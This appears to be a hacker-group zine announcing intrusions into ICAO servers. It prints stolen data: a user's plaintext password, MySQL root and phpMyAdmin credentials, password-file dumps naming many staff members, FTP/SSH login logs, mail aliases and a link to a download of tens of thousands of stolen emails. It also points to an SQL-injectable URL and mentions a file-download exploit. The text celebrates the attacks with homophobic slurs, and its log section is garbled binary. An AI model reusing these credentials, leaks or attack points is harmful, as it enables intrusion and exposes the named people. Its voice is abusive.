		X-LibVersion: 3.3.1
		MIME-Version: 1.0
		Content-Type: multipart/alternative;
 		boundary="_=_swift-13602789785347f0d0df28b2.21080339_=_"
		Content-Transfer-Encoding: 7bit
		Message-ID: <[email protected]>

		This is a message in multipart MIME format.  Your mail client should not
		be displaying this. Consider upgrading your mail client to view this
		message correctly.
		--_=_swift-13602789785347f0d0df28b2.21080339_=_
		Content-Type: text/html; charset=iso-8859-1
		Content-Transfer-Encoding: 8bit

		<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN">
		<html>
	        <head><title>New Password</title></head>
	        <body>
		<p>First Name: Tahir</p>
		<p>Last Name: Ibragimov</p>
		<p>Your new password is "8N9cKVMK". 
		But if you wish you can change it: use this new password to sign in. Then click on "Edit Info". Here you can generate new pass.</p>

	cat /etc/passwd

	nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
	root:*:0:0:System Administrator:/var/root:/bin/sh
	daemon:*:1:1:System Services:/var/root:/usr/bin/false
	smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/f
	lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/fa
	postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin
	www:*:70:70:World Wide Web Server:/Library/WebServer:/us
	eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
	mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
	sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/b
	qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/
	cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
	mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
	appserver:*:79:79:Application Server:/var/empty:/usr/bin
	unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

      We also managed to prove that they do indeed log, and that their claims were indeed bullshit; That is included in the download, along with 40,000 Emails from their smtp.
	By the way, STCU works with WMD(Weapons Of Mass Destruction workers.) Through one of the SQL Injections, we noticed a DB called PPDB2 that had tables called "WeaponCode" several of them too, didn't bother with it; but, yeah.
        Enjoy reading 30k+ emails, and owning fagots who make the weapons that destroy the world.


  ████  █  █████  ██████   ████   █████
 █    █      █   █      █ █    █ █     █
 █    █      █   █        █    █ █     █
  █████	     █   █        ██████ █     █
      █      █   █        █    █ █     █
 █    █      █   █      █ █    █ █     █
  ████  █  █████  ██████  █    █  █████


	Alright, we're going to start this off with something fucking hilarious we found in their PHPBB Forum:
	    if ( !defined('IN_PHPBB') ) { die("Hacking attempt"); }

 	LMFAO, That is pretty damn great; Now, what is ICAO?
         The International Civil Aviation Organization is a specialized agency of the United Nations. 
	 It codifies the principles and techniques of international air navigation and fosters the planning and development of international air transport to ensure safe and orderly growth. 
	 Its headquarters are located in the Quartier International of Montreal, Quebec, Canada.

	Well, first off we found a MSACCESS SQL Injection on legacy.icao.int: http://legacy.icao.int/fsix/auditRep3_icvm.cfm?s=Solomon%20Islands&i=159
         From the injection? We weren't able to do much, couldn't find the propper tables and only loaded the drives:
         
	legacy.icao.int drives:
	A = Disk or network error 
	C = Could not find file 'C:\.mdb'.
	D = Disk or network error. 
	E = Could not find file 'E:\.mdb'.
	G = Could not find file 'G:\.mdb'.
	S = Could not find file 'S:\.mdb'.

 	 So, we did some more research; Came across paris.icao.int which had a local file download exploit; and, whelp, the rest is history.

	paris.icao.int:

	MySQL root login:
	1$dbhost = "localhost"; //Hostname of the MySQL-Server $dbname = "docman_open_meetings"; //Database-Name $dbuser = "root"; //Database-Username $dbpass = "paco6433"; //Database-Password
	
	/*
 	* phpMyAdmin configuration storage settings.
 	*/

	/* User used to manipulate with storage */
	$cfg['Servers'][$i]['controluser'] = 'aqueos_pma';
	$cfg['Servers'][$i]['controlpass'] = 'Aque0SRT56uUU87';

	// configuration speciale
	// rien de special

	phpmyadminkey: 9CgJjGCjG3KZSyajtvxGrpB3mp6ZYKf1pJlfvl61ruKwf


	# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
	#
	root:*:0:0:netfab06:/root:/bin/csh
	toor:*:0:0:Bourne-again Superuser:/root:
	daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
	operator:*:2:5:System &:/:/usr/sbin/nologin
	bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
	tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
	kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
	games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
	news:*:8:8:News Subsystem:/:/usr/sbin/nologin
	man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
	ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
	sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
	smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
	mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
	bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
	spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
	cyrus:*:60:60:The Cyrus mail server:/nonexistent:/sbin/nologin
	pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
	webadmin:*:79:79:Web Admin:/www:/bin/csh
	www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
	clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
	nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
	dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
	netfa5:*:1001:1001:Administrative User:/home/netfa5:/bin/tcsh
	aqadmin:*:47000:4733:Utilisateur d administration, ne pas detruire.:/usr/local/.aqadmin/home/aqadmin:/bin/tcsh
	aqbaseuser:*:47001:4733:Utilisateur d administration, ne pas detruire.:/usr/local/.aqadmin/home/baseuser:/sbin/nologin
	aqbackup:*:47003:4733:Utilisateur de backup, ne pas detruire.:/usr/local/.aqadmin/home/backup:/bin/sh
	aqmonitoring:*:47002:4733:Utilisateur de surveillance serveur, ne pas detruire.:/usr/local/.aqadmin/home/monitoring:/usr/sbin/nologin
	accesclient:*:47100:4733:Utilisateur d administration pour le client, ne pas detruire.:/home/accesclient:/bin/tcsh
	mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
	icaobigmanitou:*:1002:1002:webmaster:/home/icaobigmanitou:/sbin/nologin
	administrator:*:1005:1005:Administrator:/home/administrator:/sbin/nologin
	gfirican:*:1011:1011:George FIRICAN:/home/gfirican:/sbin/nologin
	icaoeurnat:*:1012:1012:Official E-mail:/home/icaoeurnat:/sbin/nologin
	jlevina:*:1014:1014:Johanna LEVINA:/home/jlevina:/sbin/nologin
	ngoldschmid:*:1021:1021:Nikki GOLDSCHMID:/home/ngoldschmid:/sbin/nologin
	pcuff:*:1024:1024:Patricia CUFF:/home/pcuff:/sbin/nologin
	sfoure:*:1027:1027:Severine FOURE:/home/sfoure:/sbin/nologin
	vkourenkov:*:1028:1028:Victor KOURENKOV:/home/vkourenkov:/sbin/nologin
	lsuleymanova:*:1034:1034:Leyla Suleymanova:/home/lsuleymanova:/sbin/nologin
	smtprelay:*:1037:1037:smtprelay:/home/smtprelay:/sbin/nologin
	webmaster:*:1038:1038:WEBMASTER:/home/webmaster:/sbin/nologin
	pcaviston1:*:1043:1043:Patricia CAVISTON:/home/pcaviston1:/sbin/nologin
	pcaviston:*:1044:1044:Patricia CAVISTON:/home/pcaviston:/sbin/nologin
	safireicao:*:1045:1045:SAFIREICAO:/home/safireicao:/sbin/nologin
	enahmadov:*:1047:1047:Elkhan NAHMADOV:/home/enahmadov:/sbin/nologin
	cdaly:*:1048:1048:Catherine DALY:/home/cdaly:/sbin/nologin
	reception:*:1049:1049:Reception:/home/reception:/sbin/nologin
	adm:*:1055:1055:ADMINISTRATION:/home/adm:/sbin/nologin
	rdimartino:*:1056:1056:Rosa Di Martino:/home/rdimartino:/sbin/nologin
	fbrosseau:*:1057:1057:Frédéric Brosseau:/home/fbrosseau:/sbin/nologin
	nrallo:*:1058:1058:Nicolas Rallo:/home/nrallo:/sbin/nologin
	jmasson:*:1059:1059:Jérémie MASSON:/home/jmasson:/sbin/nologin
	skacprzak:*:1061:1061:Sebastian Kacprzak:/home/skacprzak:/sbin/nologin
	lvonlanthen:*:1062:1062:Leon Vonlanthen:/home/lvonlanthen:/sbin/nologin
	comregister:*:1064:1064:comregister:/home/comregister:/sbin/nologin
	safire:*:1065:1065:safire:/home/safire:/sbin/nologin
	natfig:*:1066:1066:natfig:/home/natfig:/sbin/nologin
	ihofstetter:*:1069:1069:Isabelle HOFSTETTER:/home/ihofstetter:/sbin/nologin
	llazosilva:*:1070:1070:Lino LAZO SILVA:/home/llazosilva:/sbin/nologin
	bbenoist:*:1071:1071:Ben Benoist:/home/bbenoist:/sbin/nologin
	eandd:*:1072:1072:EANDD:/home/eandd:/sbin/nologin
	shalle:*:1073:1073:Sven HALLE:/home/shalle:/sbin/nologin
	cottieno:*:1074:1074:Carolyne OTTIENO:/home/cottieno:/sbin/nologin
	glpi:*:1075:1075:GLPI:/home/glpi:/sbin/nologin
	amoater:*:1076:1076:Aurel Moater:/home/amoater:/sbin/nologin
	lfonsecaalmeida:*:1078:1078:Luis Fonseca de Almeida:/home/lfonsecaalmeida:/sbin/nologin
	ckeohan:*:1080:1080:Christopher KEOHAN:/home/ckeohan:/sbin/nologin
	rsaidi:*:1081:1081:Rime Saidi:/home/rsaidi:/sbin/nologin
	cludorf:*:1082:1082:Cornelia Ludorf:/home/cludorf:/sbin/nologin
	rsalomon:*:1083:1083:Rodolphe SALOMON:/home/rsalomon:/sbin/nologin
	adesaintseine:*:1084:1084:Amy de SAINT SEINE:/home/adesaintseine:/sbin/nologin
	jludorf:*:1085:1085:Jürgen LUDORF:/home/jludorf:/sbin/nologin
	admleave:*:1086:1086:ADM Leave:/home/admleave:/sbin/nologin
	emurdoch:*:1087:1087:Eileen Murdoch:/home/emurdoch:/sbin/nologin
	fax-in:*:1088:1088:Fax-IN:/home/fax-in:/sbin/nologin
	cfigueiredo:*:1090:1090:Celso do Couto FIGUEIREDO:/home/cfigueiredo:/sbin/nologin
	mmincic:*:1091:1091:Masa MINCIC:/home/mmincic:/sbin/nologin
	fax-in2:*:1092:1092:fax-in2:/home/fax-in2:/sbin/nologin
	bbrunette:*:1093:1093:Benoit BRUNETTE:/home/bbrunette:/sbin/nologin
	lfigueiredo:*:1094:1094:Luis Pedro FIGUEIREDO:/home/lfigueiredo:/sbin/nologin
	jricchetti:*:1095:1095:Joelle Ricchetti:/home/jricchetti:/sbin/nologin
	donotreply:*:1096:1096:donotreply:/home/donotreply:/sbin/nologin

FTP & SSH log:

ftp7524 ftp             120.11.168.201  E5:Sftp7524                 120.11.168.201  Ê5:Sftp7555 ftp             221.203.97.34   6:Sftp7555                 221.203.97.34    6:Sftp8836 ftp             112.197.0.121   ÂF:Sftp8836                 112.197.0.121   ÏF:Sftp9909 ftp             36.33.33.235    R:Sftp9909                 36.33.33.235    R:Sftp3423 ftp             82.78.32.101    ²s:Sftp3443 ftp             125.76.163.137  ñs:Sftp3443                 125.76.163.137  t:Sftp3423                 82.78.32.101    2t:Sftp3603 ftp             114.39.30.54    Bu:Sftp3603                 114.39.30.54    Ku:Sftp3990 ftp             115.47.9.141    lx:Sftp3990                 115.47.9.141    vx:Sftp4044 ftp             14.198.72.4     y:Sftp4044                 14.198.72.4     Ey:Sftp6992 ftp             61.219.91.207   J’:Sftp6992                 61.219.91.207   …’:Sftp7564 ftp             123.247.15.92   Ú—:Sftp7564                 123.247.15.92   š˜:Sftp8719 ftp             85.185.238.216  ¢:Sftp8719                 85.185.238.216  œ¢:Sftp9643 ftp             134.249.97.161  ëª:Sftp9643                 134.249.97.161  ýª:Sftp9920 ftp             117.194.197.24  g:Sftp9920                 117.194.197.24  q:Sftp1673 ftp             39.1.1.60       ܽ:Sftp1673                 39.1.1.60       9¾:Sftp1953 ftp             123.195.45.36   ¢À:Sftp1953                 123.195.45.36   ÜÀ:Sftp2783 ftp             117.223.132.208 ÖÈ:Sftp2783                 117.223.132.208 ÷È:Sftp4489 ftp             114.39.9.89     oÚ:Sftp4489                 114.39.9.89     ƒÚ:Sftp1812 ftp             85.100.5.98     v#;Sftp1812                 85.100.5.98     “#;Sftp2576 ftp             220.133.175.190 E+;Sftp2576                 220.133.175.190 —+;Sftp7643 ftp             36.225.78.230   d;Sftp7643                 36.225.78.230   cd;Sftp8478 ftp             61.219.91.207   Än;Sftp8478                 61.219.91.207    o;Sftp8711 ftp             5.165.83.10     ¤p;Sftp8711                 5.165.83.10     ³p;Sftp8736 ftp             	112.197.0.121   q;Sftp8736                 112.197.0.121   q;Sftp6551 ftp             112.90.231.27   ö†;Sftp6551                 112.90.231.27   ‡;Sftp1312 ftp             49.159.169.40   a;Sftp1312                 49.159.169.40   Ì;Sftp2030 ftp             101.17.42.34    Θ;Sftp2030                 101.17.42.34    Û˜;Sftp3687 ftp             178.187.232.203 z«;Sftp3687                 178.187.232.203 Œ«;Sftp4408 ftp             111.37.6.21     ³;Sftp4408                 111.37.6.21     &³;Sftp6377 ftp             82.114.80.154   áÆ;Sftp6377                 82.114.80.154   èÆ;Sftp6954 ftp             124.228.11.92   ÛÌ;Sftp6954                 124.228.11.92   øÌ;Sftp7124 ftp             223.82.145.125  VÎ;Sftp7124                 223.82.145.125  kÎ;Sftp7664 ftp             223.78.158.133  ¼Ó;Sftp7664                 223.78.158.133  ÆÓ;Sftp9560 ftp             221.196.153.2   %å;Sftp9560                 221.196.153.2   1å;Sftp5390 ftp             1.52.237.140    î;Sftp5390                 1.52.237.14	0    î;Sftp1766 ftp             1.165.195.171   ‰ù;Sftp1766                 1.165.195.171   —ù;Sftp2714 ftp             113.227.42.32   ¿<Sftp2714                 113.227.42.32   Í<Sftp2782 ftp             111.37.11.38     <Sftp2782                 111.37.11.38    +<Sftp3867 ftp             36.225.78.230   ô
<Sftp3867                 36.225.78.230   •<Sftp8382 ftp             58.42.237.32    6;<Sftp8382                 58.42.237.32    M;<Sftp8509 ftp             123.201.4.120   †<<Sftp8509                 123.201.4.120   ¦<<Sftp9240 ftp             115.47.9.141    ;D<Sftp9240                 115.47.9.141    KD<Sftp2979 ftp             116.113.47.38   bm<Sftp2979                 116.113.47.38   ¦m<Sftp3612 ftp             219.142.42.9    Gt<Sftp3612                 219.142.42.9    Xt<Sftp3734 ftp             89.209.126.207  gu<Sftp3734                 89.209.126.207  ou<Sftp8197 ftp             221.203.97.34   ¦¦<Sftp8197                 221.203.97.34   ²¦<Sftp8629 ftp             218.65.246.44   q¬<Sftp8629                 218.65.246.44   ¬<Sftp8877 ftp             221.194.231.19  z¯<Sftp8877                 221.194.231.19  ¯<Sftp8883 ftp             112.233.202.250 ¤¯<Sftp8883                 112.233.202.250 Ư<Sftp2042 ftp             124.202.160.186 ]½<Sftp2042                 124.202.160.186 j½<Sftp4303 ftp             99.137.34.85    žÀ<Sftp4303                 99.137.34.85    µÀ<Sftp7700 ftp             60.10.57.89     òÃ<Sftp7700                 60.10.57.89     	Ä<Sftp2438 ftp             94.89.82.162    Ã×<Sftp2438                 94.89.82.162    AØ<Sftp3216 ftp             119.183.122.170  â<Sftp3216                 119.183.122.170 aâ<Sftp3665 ftp             218.205.36.192  ¾ç<Sftp3665                 218.205.36.192  Ñç<Sftp3721 ftp             112.197.0.121   ’è<Sftp3721                 112.197.0.121   è<Sftp4258 ftp             116.207.53.177  ï<Sftp4258                 116.207.53.177  +ï<Sftp4633 ftp             121.16.150.181  ¥ó<Sftp4633                 121.16.150.181  Øó<Sftp5598 ftp             117.170.250.137 Áþ<Sftp5598                 117.170.250.137 Ïþ<Sftp9610 ftp             115.249.55.107  ’&=Sftp9610                 115.249.55.107  š&=Sftp9738 ftp             82.137.12.34    e'=Sftp9738                 82.137.12.34    Ö.=Sftp3307 ftp             183.131.67.229  .I=Sftp3307                 183.131.67.229  <I=Sftp4127 ftp             1.214.254.122   ÀP=Sftp4127                 1.214.254.122   ÌP=Sftp5110 ftp             124.202.160.186 "Y=Sftp5110                 124.202.160.186 NY=Sftp7361 ftp             36.225.227.37   •l=Sftp7361                 36.225.227.37   ïl=Sftp8583 ftp             220.170.208.223 Žy=Sftp8583                 220.170.208.223 Åy=Sftp8778 ftp             117.136.37.2    {=Sftp8778                 117.136.37.2    Ø{=Sftp8992 ftp             222.126.146.107 %~=Sftp8992                 222.126.146.107 :~=Sftp9382 ftp             222.189.57.182  Œ‚=Sftp9382                 222.189.57.182  ´‚=Sftp2136 ftp             115.47.9.141    Û =Sftp2136                 115.47.9.141    ¡=Sftp3424 ftp             221.14.147.109  >Sftp3424                 221.14.147.109  Â>Sftp4797 ftp             180.215.124.28  k/>Sftp4797                 180.215.124.28  ,0>Sftp6193 ftp             180.218.2.84    oA>Sftp6193                 180.218.2.84    ‚A>Sftp9563 ftp             42.118.228.12   0h>Sftp9563                 42.118.228.12   Fh>Sftp3632 ftp             1.171.25.34     …Ž>Sftp3632                 1.171.25.34     œŽ>Sftp8037 ftp             134.255.142.228 ̺>Sftp8037                 134.255.142.228 Òº>Sftp2210 ftp             93.179.103.57   ŸÏ>Sftp2210                 93.179.103.57   ÇÏ>Sftp1904 ftp             78.189.127.105  S?Sftp1904                 78.189.127.105  Y?Sftp2687 ftp             99.137.34.85    j?Sftp2687                 99.137.34.85    €?Sftp9053 ftp             116.77.115.3    
=?Sftp9053                 116.77.115.3    =?Sftp6037 ftp             61.172.115.227  ÏM?Sftp6037                 61.172.115.227  åM?Sftp2233 ftp             222.126.146.107 }]?Sftp2233                 222.126.146.107 ‡]?Sftp3817 ftp             113.240.231.170 /o?Sftp3817                 113.240.231.170 Eo?Sftp7923 ftp             93.157.19.68    # ?Sftp7923                 93.157.19.68    / ?Sftp8364 ftp             182.39.98.160   t¥?Sftp8364                 182.39.98.160   ‡¥?Sftp6371 ftp             61.172.115.227  éb@Sftp6371                 61.172.115.227  öb@Sftp8246 ftp             78.189.127.105  Ãw@Sftp8246                 78.189.127.105  Ëw@Sftp6628 ftp             178.33.21.143   ®Ü@Sftp6628                 178.33.21.143   ¯Ü@Sftp634  ftp             125.104.83.30   ?ASftp634                  125.104.83.30   IASftp5341 ftp             27.38.38.128    =BSftp5341                 27.38.38.128    OBSftp1420 icaobigmanitou  94.228.187.146  åSBSftp1420                 94.228.187.146  øSBSftp1923 icaobigmanitou  94.228.187.146  +TBSftp1923                 94.228.187.146  2TBSftp2494 ftp             36.227.111.251  …ÅBSftp2494                 36.227.111.251  ÅBSftp2830 ftp             222.126.146.107 +CSftp2830                 222.126.146.107 +CSftp5453 ftp             36.239.34.122   ¼DCSftp5453                 36.239.34.122   ÄDCSftp6925 ftp             114.39.29.94    ÜQCSftp6925                 114.39.29.94    èQCSftp7034 ftp             1.52.237.230    êRCSftp7034                 1.52.237.230    óRCSftp9194 ftp             60.29.59.58     ö»CSftp9194                 60.29.59.58      ¼CSftp5759 ftp             221.1.213.86    ²úCSftp5759                 221.1.213.86    ÎúCSftp3980 ftp             178.137.2.93    KDSftp3980                 178.137.2.93    RKDSftp3019 ftp             180.166.245.174 ·¯DSftp3019                 180.166.245.174 ȯDSftp3387 ftp             123.171.4.157   ¹´DSftp3387                 123.171.4.157   Ë´DSftp7297 ftp             119.86.148.103  GãDSftp7297                 119.86.148.103  ZãDSftp2948 ftp             134.255.159.163 ùESftp2948                 134.255.159.163 ýESftp5755 ftp             85.185.238.216  †3ESftp5755                 85.185.238.216  “3ESftp9992 ftp             94.41.71.136    ÃYESftp9992                 94.41.71.136    ØYESftp1697 ftp             58.116.64.8     9KFSftp1697                 58.116.64.8     EKFSftp3896 ftp             58.116.64.8     À_FSftp3896                 58.116.64.8     ù_FSftp9257 icaobigmanitou  94.228.187.146  Ç“FSftp9257                 94.228.187.146  •FSftp8567 ftp             49.159.169.40   Z£FSftp8567                 49.159.169.40   u£FSftp7428 ftp             93.157.21.151   üåFSftp7428                 93.157.21.151   æFSftp4878 ftp             66.249.79.14    ð9GSftp4878                 66.249.79.14    ñ9GSftp4879 ftp             66.249.74.104   ó9GSftp4879                 66.249.74.104   ó9GSftp6702 ftp             36.239.32.22    èNGSftp6702                 36.239.32.22    ôNGSftp5388 ftp             66.249.79.14    [®GSftp5388                 66.249.79.14    \®GSftp2274 ftp             201.94.154.27   àñGSftp2274                 201.94.154.27   çñGSftp4545 ftp             163.125.220.43  ÊzHSftp4545                 163.125.220.43  ÓzHSftp6219 ftp             74.95.10.210    ŒHSftp6219                 74.95.10.210    ŒHSftp7843 ftp             66.249.75.152   šžHSftp7843                 66.249.75.152   šžHSftp7843 ftp             66.249.75.152   ›žHSftp7843                 66.249.75.152   œžHSftp8698 ftp             188.253.41.195  †ÁHSftp8698                 188.253.41.195  ŠÁHSftp3916 ftp             176.205.133.107 §èHSftp3916                 176.205.133.107 ¯èHSftp6477 ftp             27.32.173.218   ‹ ISftp6477                 27.32.173.218   Ê ISftp1711 ftp             5.53.205.21     PAISftp1711                 5.53.205.21     sAISftp6754 ftp             221.196.55.244  „yISftp6754                 221.196.55.244  ™yISftp8042 ftp             220.244.55.106  àxJSftp8042                 220.244.55.106  þxJSftp9618 ftp             85.185.238.216  T‹JSftp9618                 85.185.238.216  ^‹JSftp5554 ftp             94.41.85.175    BËJSftp5554                 94.41.85.175    FËJSftp5664 ftp             60.29.59.58     íÌJSftp5664                 60.29.59.58     üÌJSftp5736 ftp             222.141.54.78   zÍJSftp5736                 222.141.54.78   “ÍJSftp3607 ftp             195.244.160.110 yKSftp3607                 195.244.160.110 zKSftp1112 ftp             36.224.17.227   $
KSftp1112                 36.224.17.227   ,
KSftp1258 ftp             178.33.21.143   ÄKSftp1258                 178.33.21.143   ÆKSftp5674 ftp             36.227.173.52   {DKSftp5674                 36.227.173.52   ƒDKSftp9286 ftp             178.187.221.145 JrKSftp9286                 178.187.221.145 MrKSftp1629 ftp             119.9.69.153    •ŠKSftp1629                 119.9.69.153    œŠKSftp1378 ftp             119.177.84.73   ¬ÝKSftp1378                 119.177.84.73   ¶ÝKSftp3057 ftp             89.165.235.90   ÐëKSftp3057                 89.165.235.90   ÒëKSftp7793 ftp             5.79.156.207    LSftp7793                 5.79.156.207    ‡LSftp3582 ftp             89.165.235.90   øNLSftp3582                 89.165.235.90   ûNLSftp2359 ftp             220.162.158.45  ›LSftp2359                 220.162.158.45  ›LSftp3193 icaobigmanitou  94.228.187.146  [êLSftp3350 ftp             222.161.213.41  ëLSftp3350                 222.161.213.41  hìLSftp3985 icaobigmanitou  94.228.187.146  ñLSftp3193                 94.228.187.146  bñLSftp4024 icaobigmanitou  94.228.187.146  xñLSftp4024 icaobigmanitou  94.228.187.146  yñLSftp4129 icaobigmanitou  94.228.187.146  +òLSftp4129 icaobigmanitou  94.228.187.146  +òLSftp4147 icaobigmanitou  94.228.187.146  DòLSftp4154 icaobigmanitou  94.228.187.146  SòLSftp4129                 94.228.187.146  [óLSftp3985                 94.228.187.146  kóLSftp4449 icaobigmanitou  94.228.187.146  0õLSftp4024                 94.228.187.146  HöLSftp4613 icaobigmanitou  94.228.187.146  “öLSftp4704 icaobigmanitou  94.228.187.146  ˆ÷LSftp4147                 94.228.187.146  «÷LSftp4129                 94.228.187.146  ŸøLSftp4154                 94.228.187.146  ÇùLSftp5263 icaobigmanitou  94.228.187.146  ¤üLSftp5364 icaobigmanitou  94.228.187.146  €ýLSftp4449                 94.228.187.146  ²ýLSftp4704                 94.228.187.146  “þLSftp5548 icaobigmanitou  94.228.187.146  BÿLSftp5263                 94.228.187.146  
 MSftp5655 icaobigmanitou  94.228.187.146  % MSftp4613                 94.228.187.146  Y MSftp5945 icaobigmanitou  94.228.187.146  7MSftp4024                 94.228.187.146  NMSftp6481 icaobigmanitou  94.228.187.146  ^ MSftp5655                 94.228.187.146  ˜ MSftp6543 icaobigmanitou  94.228.187.146  ð MSftp6576 icaobigmanitou  94.228.187.146  BMSftp5945                 94.228.187.146  	MSftp6543                 94.228.187.146  Z	MSftp8044 ftp             89.184.108.5    ùMSftp8044                 89.184.108.5    ûMSftp8189 icaobigmanitou  94.228.187.146  BMSftp5364                 94.228.187.146  YMSftp8485 icaobigmanitou  94.228.187.146  ËMSftp6576                 94.228.187.146  áMSftp8771 icaobigmanitou  94.228.187.146  MSftp6481                 94.228.187.146  MSftp5548                 94.228.187.146  vMSftp8771                 94.228.187.146  vMSftp8485                 94.228.187.146  vMSftp8189                 94.228.187.146  MSftp6296 ftp             1.171.49.232    NSftp6296                 1.171.49.232    NSftp3599 ftp             2.49.213.192    ÿ'NSftp3599                 2.49.213.192    (NSftp5729 ftp             113.162.216.160 g=NSftp5729                 113.162.216.160 p=NSftp7059 ftp             180.166.7.134   ÐINSftp7059                 180.166.7.134   ×INSftp7267 ftp             78.189.192.133  ÓKNSftp7267                 78.189.192.133  ßKNSftp9511 icaobigmanitou  94.228.187.146  ˜`NSftp9525 icaobigmanitou  94.228.187.146  º`NSftp9542 icaobigmanitou  94.228.187.146  aNSftp9542                 94.228.187.146  aNSftp9525                 94.228.187.146  aNSftp9511                 94.228.187.146  aNSftp1108 ftp             86.106.172.126  #qNSftp1108                 86.106.172.126  HqNSftp1364 ftp             71.6.165.200    ˜sNSftp1364                 71.6.165.200    ˜sNSftp7878 ftp             93.114.240.222  m°NSftp7878                 93.114.240.222  o°NSftp9979 ftp             5.206.125.68    ?ÇNSftp9979                 5.206.125.68    BÇNSftp8649 ftp             180.218.30.189  Á+OSftp8649                 180.218.30.189  É+OSftp1848 ftp             113.162.216.160 ©SOSftp1848                 113.162.216.160 ³SOSftp2952 ftp             213.111.216.109 =`OSftp2952                 213.111.216.109 T`OSftp4844 ftp             178.95.196.144  vOSftp4844                 178.95.196.144  vOSftp7634 ftp             5.165.95.101    *”OSftp7634                 5.165.95.101    ,”OSftp8082 icaobigmanitou  94.228.187.146  ™OSftp8082                 94.228.187.146  2™OSftp8181 icaobigmanitou  94.228.187.146  *šOSftp8181                 94.228.187.146  0šOSftp8830 ftp             1.170.123.218   ± OSftp8830                 1.170.123.218   » OSftp9202 ftp             116.202.154.234 ñ£OSftp9202                 116.202.154.234 ¤OSftp3903 ftp             182.180.89.201  éÏOSftp3903                 182.180.89.201  ðÏOSftp7906 ftp             213.155.207.228 —çOSftp7906                 213.155.207.228 £çOSftp1440 ftp             37.113.3.99     üOSftp1440                 37.113.3.99     
üOSftp3488 ftp             89.149.94.150   DPSftp3488                 89.149.94.150   GPSftp1774 ftp             49.254.137.34   #iPSftp1774                 49.254.137.34   +iPSftp5173 ftp             180.218.48.24   Í¥PSftp5173                 180.218.48.24   Õ¥PSftp8104 ftp             198.20.70.114   ¬ÍPSftp8104                 198.20.70.114   ÍPSftp4246 ftp             178.94.209.169  _QSftp4246                 178.94.209.169  dQSftp5829 ftp             123.195.113.183 Á#QSftp5829                 123.195.113.183 Ù#QSftp9356 ftp             67.215.9.229    „ÄQSftp9356                 67.215.9.229    IÆQSftp2030 ftp             116.224.67.61   ~äQSftp2030                 116.224.67.61   ˆäQSftp4267 ftp             61.172.115.229  SRSftp4267                 61.172.115.229  _RSftp5270 ftp             14.139.244.115  wRSftp5270                 14.139.244.115  RSftp6046 ftp             164.100.6.2     RSftp6046                 164.100.6.2      RSftp4571 ftp             5.165.70.234    +„RSftp4571  
               5.165.70.234    3„RSftp6092 ftp             50.23.237.141   *SSftp6092                 50.23.237.141   0SS

lastlog:

’_NSttyp0   94.228.187.146  à§Rttyp0   94.228.187.146  S Sttyp0   adsl1.aqueos.co 

/etc/aliases:
paris.icao.int~soaeurnat: [email protected], [email protected], [email protected]@paris.icao.int paris.icao.int~gvega: [email protected] paris.icao.int~fjouve: [email protected]




  █████  █   █ ███████ ████   █████
 █     █ █   █    █    █   █ █     █ - And download.
 █     █ █   █    █    █     █     █
 █     █ █   █    █    █     █     █
  █████  █████    █    █      █████

  o                |
             .     -O-    
  .                 |        *      .     -0-     Until next time, fellas!
         *  o     .    '       *      .        o
                .         .        |      *
     *             *              -O-          .
           .             *         |     ,
                  .           o
          .---.
    =   _/__~0_\_     .  *            o       ' 
   = = (_________)             .            
                   .                        *
        *               - ) -       *      
                .               .

    Aww, sad-face, NullCrew's zine is over? Yes, it is; but it's not the end of NullCrew or #FuckTheSystem.
   We will continue on our way, flying our saucer over government fagots; dropping a probe, and having it shoved up theri anus.
   It never ends, and we will never stop; Hacktivists, activists, and the people have all pointed their finger at this system.. and we will see it crumble.
   
    This is also a thank you to those whom have stuck with us for this past year and some odd months.
   Thank you to our fans, haters, and supporters; let us have a wonderful year, and show them what they don't want to see.
   A nation united by people who have no fear, and see through your lies.. your shadows are being cast away, and do not affect us.

    We are free, and that is a beautiful thing to say..

    We know, we know! Enough with the rants, yes?
   Here, have the download link already; you silly faggots, and one last thing:
    
   █████████████████████████████████████████████████████████████████████████████
  █                                                                             █
  █  https://mega.co.nz/#!dcZiXaaa!G1HFhBgra3I51pxxiPsvUCV9mh-dMv2lA54bmERVPa8  █                                                                       █
  █                                                                             █
   █████████████████████████████████████████████████████████████████████████████


                      dm
                      MMr
                     4MMML                  .
                     MMMMM.                xf
     .              "M6MMM               .MM-
      Mh..          +MM5MMM            .MMMM
      .MMM.         .MMMMML.          MMMMMh
       )MMMh.        MM5MMM         MMMMMMM
        3MMMMx.     'MMM3MMf      xnMMMMMM"
        '*MMMMM      MMMMMM.     nMMMMMMP"
          *MMMMMx    "MMM5M\    .MMMMMMM=
           *MMMMMh   "MMMMM"   JMMMMMMP
             MMMMMM   GMMMM.  dMMMMMM            .
